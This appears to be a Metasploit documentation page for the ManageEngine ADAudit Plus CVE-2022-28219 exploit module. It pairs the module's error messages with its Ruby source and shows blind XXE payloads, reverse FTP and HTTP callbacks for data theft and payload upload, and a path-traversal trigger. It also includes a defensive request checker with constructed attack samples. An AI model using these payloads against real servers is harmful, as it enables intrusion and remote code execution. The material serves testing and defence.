- Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)
- Failed to find any non-default user accounts
- Exploit appeared to work, but could not find the payload on the target
- Found <POSSIBLE_PAYLOADS.LENGTH> apparent payloads in temp folders - aborting!
- Path traversal request failed with HTTP/<VALUE>
- XXE request to get directory listing failed with HTTP/<VALUE>
- FTP reverse connection for directory enumeration failed - <FTP_URL>
- Did not receive data from our reverse FTP connection
- Didn't receive expected FTP connection
- FTP client connected, but we did not receive any data over the socket
- Couldn't get directory listing for <DIR>
- XXE request to upload file did not receive a reverse connection on <SRVPORT_HTTP2>
- XXE request to upload payload failed with HTTP/<VALUE>
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Target failed to respond to check.
Here is a relevant code snippet related to the "Target failed to respond to check." error message:
    'method' => 'GET',
    'uri' => '/'
  )

  unless res1
    return CheckCode::Unknown('Target failed to respond to check.')
  end

  unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)
    return CheckCode::Safe('Does not appear to be ADAudit Plus')
  end
Does not appear to be ADAudit Plus
Here is a relevant code snippet related to the "Does not appear to be ADAudit Plus" error message:
  unless res1
    return CheckCode::Unknown('Target failed to respond to check.')
  end

  unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)
    return CheckCode::Safe('Does not appear to be ADAudit Plus')
  end

  # Check if it's a vulnerable version (the patch removes the /cewolf endpoint
  # entirely)
  res2 = send_request_cgi(
Target failed to respond to check.
Here is a relevant code snippet related to the "Target failed to respond to check." error message:
    'method' => 'GET',
    'uri' => normalize_uri("#{datastore['TARGETURI_DESERIALIZATION']}?img=abc")
  )

  unless res2
    return CheckCode::Unknown('Target failed to respond to check.')
  end

  unless res2.code == 200
    return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')
  end
Target does not have vulnerable endpoint (likely patched).
Here is a relevant code snippet related to the "Target does not have vulnerable endpoint (likely patched)." error message:
110: unless res2
111: return CheckCode::Unknown('Target failed to respond to check.')
112: end
113:
114: unless res2.code == 200
115: return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')
116: end
117:
118: CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')
119: end
120:
The vulnerable endpoint responds with HTTP/200.
Here is a relevant code snippet related to the "The vulnerable endpoint responds with HTTP/200." error message:
113:
114: unless res2.code == 200
115: return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')
116: end
117:
118: CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')
119: end
120:
121: def exploit
122: # List the /users folder - this is good to do first, since we can fail early
123: # if something isn't working
Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)
Here is a relevant code snippet related to the "Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)" error message:
122: # List the /users folder - this is good to do first, since we can fail early
123: # if something isn't working
124: vprint_status('Attempting to exploit XXE to get a list of users')
125: users = get_directory_listing('/users')
126: unless users
127: fail_with(Failure::NotVulnerable, 'Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)')
128: end
129:
130: # Remove common users
131: users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']
132: if users.empty?
Failed to find any non-default user accounts
Here is a relevant code snippet related to the "Failed to find any non-default user accounts" error message:
128: end
129:
130: # Remove common users
131: users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']
132: if users.empty?
133: fail_with(Failure::NotFound, 'Failed to find any non-default user accounts')
134: end
135: print_status("User accounts discovered: #{users.join(', ')}")
136:
137: # I can't figure out how to properly encode spaces, but using the 8.3
138: # version works! This converts them
Exploit appeared to work, but could not find the payload on the target
Here is a relevant code snippet related to the "Exploit appeared to work, but could not find the payload on the target" error message:
167: possible_payloads = search_for_payloads(users)
168: possible_payloads -= existing_payloads
169:
170: # Make sure the payload exists
171: if possible_payloads.empty?
172: fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')
173: end
174:
175: # If multiple payloads appeared, abort for safety
176: if possible_payloads.length > 1
177: fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")
Found <POSSIBLE_PAYLOADS.LENGTH> apparent payloads in temp folders - aborting!
Here is a relevant code snippet related to the "Found <POSSIBLE_PAYLOADS.LENGTH> apparent payloads in temp folders - aborting!" error message:
172: fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')
173: end
174:
175: # If multiple payloads appeared, abort for safety
176: if possible_payloads.length > 1
177: fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")
178: end
179:
180: # Execute the one payload
181: payload_path = possible_payloads.pop
182: print_status("Triggering payload: #{payload_path}...")
Path traversal request failed with HTTP/<VALUE>
Here is a relevant code snippet related to the "Path traversal request failed with HTTP/<VALUE>" error message:
185: 'method' => 'GET',
186: 'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=#{'/..' * datastore['PATH_TRAVERSAL_DEPTH']}#{payload_path}"
187: )
188:
189: if res&.code != 200
190: fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res&.code}")
191: end
192: ensure
193: # Kill the upload thread
194: if t
195: begin
XXE request to get directory listing failed with HTTP/<VALUE>
Here is a relevant code snippet related to the "XXE request to get directory listing failed with HTTP/<VALUE>" error message:
233: 'ctype' => 'application/json',
234: 'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % start \"<![CDATA[\"><!ENTITY % end \"]]>\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")
235: )
236:
237: if res&.code != 200
238: fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res&.code}")
239: end
240:
241: ftp_client = nil
242: begin
243: # Wait for a connection with a timeout
FTP reverse connection for directory enumeration failed - <FTP_URL>
Here is a relevant code snippet related to the "FTP reverse connection for directory enumeration failed - <FTP_URL>" error message:
242: begin
243: # Wait for a connection with a timeout
244: select_result = ::IO.select([ftp_server], nil, nil, datastore['FtpCallbackTimeout'])
245:
246: unless select_result && !select_result.empty?
247: print_warning("FTP reverse connection for directory enumeration failed - #{ftp_url}")
248: return nil
249: end
250:
251: # Accept the connection
252: ftp_client = ftp_server.accept
Did not receive data from our reverse FTP connection
Here is a relevant code snippet related to the "Did not receive data from our reverse FTP connection" error message:
262:
263: # Check if we ran out of data
264: if !select_result || select_result.empty?
265: # If we got nothing, we're sad
266: if directory_listing.nil? || directory_listing.empty?
267: print_warning('Did not receive data from our reverse FTP connection')
268: return nil
269: end
270:
271: # If we have data, we're happy and can break
272: break
Didn't receive expected FTP connection
Here is a relevant code snippet related to the "Didn't receive expected FTP connection" error message:
321: end
322: end
323:
324: # Handle FTP errors (which thankfully aren't as common as they used to be)
325: unless ftp_client
326: print_warning("Didn't receive expected FTP connection")
327: return nil
328: end
329:
330: if directory_listing.nil? || directory_listing.empty?
331: vprint_warning('FTP client connected, but we did not receive any data over the socket')
FTP client connected, but we did not receive any data over the socket
Here is a relevant code snippet related to the "FTP client connected, but we did not receive any data over the socket" error message:
326: print_warning("Didn't receive expected FTP connection")
327: return nil
328: end
329:
330: if directory_listing.nil? || directory_listing.empty?
331: vprint_warning('FTP client connected, but we did not receive any data over the socket')
332: return nil
333: end
334:
335: # Remove PORT commands, split at \r\n or \n, and remove empty elements
336: directory_listing.gsub(/PORT [0-9,]+[\r\n]/m, '').split(/\r?\n/).reject(&:empty?)
Couldn't get directory listing for <DIR>
Here is a relevant code snippet related to the "Couldn't get directory listing for <DIR>" error message:
340: return users.flat_map do |u|
341: dir = "/users/#{u}/appdata/local/temp"
342: # This will search for the payload, but right now just print stuff
343: listing = get_directory_listing(dir)
344: unless listing
345: vprint_warning("Couldn't get directory listing for #{dir}")
346: next []
347: end
348:
349: listing
350: .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }
XXE request to upload file did not receive a reverse connection on <SRVPORT_HTTP2>
Here is a relevant code snippet related to the "XXE request to upload file did not receive a reverse connection on <SRVPORT_HTTP2>" error message:
370: )
371:
372: # Wait for the reverse connection, with a timeout
373: select_result = ::IO.select([http_server], nil, nil, datastore['HttpUploadTimeout'])
374: unless select_result && !select_result.empty?
375: fail_with(Failure::Unknown, "XXE request to upload file did not receive a reverse connection on #{datastore['SRVPORT_HTTP2']}")
376: end
377:
378: # Receive and discard the HTTP request
379: c = http_server.accept
380: c.recv(1024)
XXE request to upload payload failed with HTTP/<VALUE>
Here is a relevant code snippet related to the "XXE request to upload payload failed with HTTP/<VALUE>" error message:
408: 'ctype' => 'application/json',
409: 'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")
410: )
411:
412: if res&.code != 200
413: fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res&.code}")
414: end
415:
416: return t
417: end
418:
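As an added defender-side example, not code from the module or the page: a small Ruby checker that flags the two request shapes visible in the snippets above, a /cewolf img parameter carrying /.. segments (path traversal) and an XML body declaring an external file:, jar:, http(s): or ftp: parameter entity (the blind XXE), run over constructed sample requests. The record layout, the helper names, the sample hosts and file names are assumptions; the JSON wrapper produced by create_json_request is not shown on the page, so the body is matched as raw text.

```ruby
require 'cgi'
require 'uri'

# Patterns drawn from the snippets above: the cewolf "img" parameter carrying
# "/.." segments, and an XML body declaring an external parameter entity
# (file:, jar:, http(s):, ftp:) as the blind XXE does. Quotes may be
# JSON-escaped (\"), so the backslash before the quote is optional.
CEWOLF_PATH = %r{/cewolf\z}i
TRAVERSAL   = %r{(?:\A|[/\\])\.\.(?:[/\\]|\z)}
EXT_ENTITY  = /<!ENTITY\s+%?\s*\w+\s+SYSTEM\s*\\?["'](?<scheme>file|jar|https?|ftp):/i

# Constructed sample requests (hypothetical hosts and names, not real traffic).
SAMPLE_REQUESTS = [
  { id: 'benign',    path: '/cewolf?img=abc', body: '' },
  { id: 'traversal', path: '/cewolf?img=/../../../../users/bob/appdata/local/temp/jar_cache123.tmp', body: '' },
  { id: 'xxe',       path: '/api/constructed-endpoint',
    body: '{"data":"<?xml version=\"1.0\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:http://198.51.100.7:8000/p.jar\"> %xxe;]>"}' }
].freeze

# Returns the reasons a request looks like CVE-2022-28219 activity; an empty
# array means nothing matched. `req` is a hash with :path (incl. query) and :body.
def xxe_traversal_indicators(req)
  reasons = []
  uri = begin
    URI.parse(req[:path].to_s)
  rescue URI::InvalidURIError
    nil
  end
  if uri && uri.path =~ CEWOLF_PATH
    img = uri.query ? Array(CGI.parse(uri.query)['img']).first.to_s : ''
    reasons << 'cewolf img parameter contains path traversal' if CGI.unescape(img) =~ TRAVERSAL
  end
  body = req[:body].to_s
  if body =~ /<!DOCTYPE/i && (m = body.match(EXT_ENTITY))
    reasons << "XML body declares external entity with #{m[:scheme].downcase}: URI"
  end
  reasons
end

# Maps request id => reasons for every sample that was flagged.
def flag_requests(requests = SAMPLE_REQUESTS)
  requests.each_with_object({}) do |req, out|
    hits = xxe_traversal_indicators(req)
    out[req[:id]] = hits unless hits.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  flag_requests.each { |id, reasons| puts "#{id}: #{reasons.join('; ')}" }
end
```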
Related Pull Requests
- #16982 Merged Pull Request: Update Dell iDRAC login scanner to work with v8 and v9
- #17032 Merged Pull Request: Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814
- #17116 Merged Pull Request: Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
- #17092 Merged Pull Request: netlm_downgrade: Cleanup and support non-Meterpreter sessions
- #16987 Merged Pull Request: guard for all possible RubySMBError conditions
- #17123 Merged Pull Request: netrc and fetchmailrc docs
- #17057 Merged Pull Request: Msf::Post::Windows::ExtAPI: Remove load_extapi method
References
- CVE-2022-28219
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
See Also
Check also the following modules related to this module:
- exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539
- exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
- exploit/windows/http/manageengine_adshacluster_rce
- exploit/windows/http/manageengine_appmanager_exec
- exploit/windows/http/manageengine_apps_mngr
- exploit/windows/http/manageengine_connectionid_write
- exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
- exploit/windows/misc/manageengine_eventlog_analyzer_rce
- auxiliary/admin/http/manageengine_dir_listing
- auxiliary/admin/http/manageengine_file_download
- auxiliary/admin/http/manageengine_pmp_privesc
- auxiliary/gather/manageengine_adaudit_plus_xnode_enum
- auxiliary/gather/manageengine_datasecurity_plus_xnode_enum
- auxiliary/scanner/http/manageengine_desktop_central_login
- auxiliary/scanner/http/manageengine_deviceexpert_traversal
- auxiliary/scanner/http/manageengine_deviceexpert_user_creds
- auxiliary/scanner/http/manageengine_securitymanager_traversal
- exploit/multi/http/manageengine_auth_upload
- exploit/multi/http/manageengine_sd_uploader
- exploit/multi/http/manageengine_search_sqli
- post/linux/gather/manageengine_password_manager_creds
- exploit/windows/http/sitecore_xp_cve_2021_42237
- auxiliary/dos/http/webkitplus
- auxiliary/scanner/http/servicedesk_plus_traversal
- auxiliary/scanner/http/support_center_plus_directory_traversal
- auxiliary/scanner/oracle/isqlplus_login
- auxiliary/scanner/oracle/isqlplus_sidbrute
- exploit/unix/ssh/arista_tacplus_shell
- exploit/windows/fileformat/zahir_enterprise_plus_csv
Authors
- Naveen Sunkavally
- Ron Bowes
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.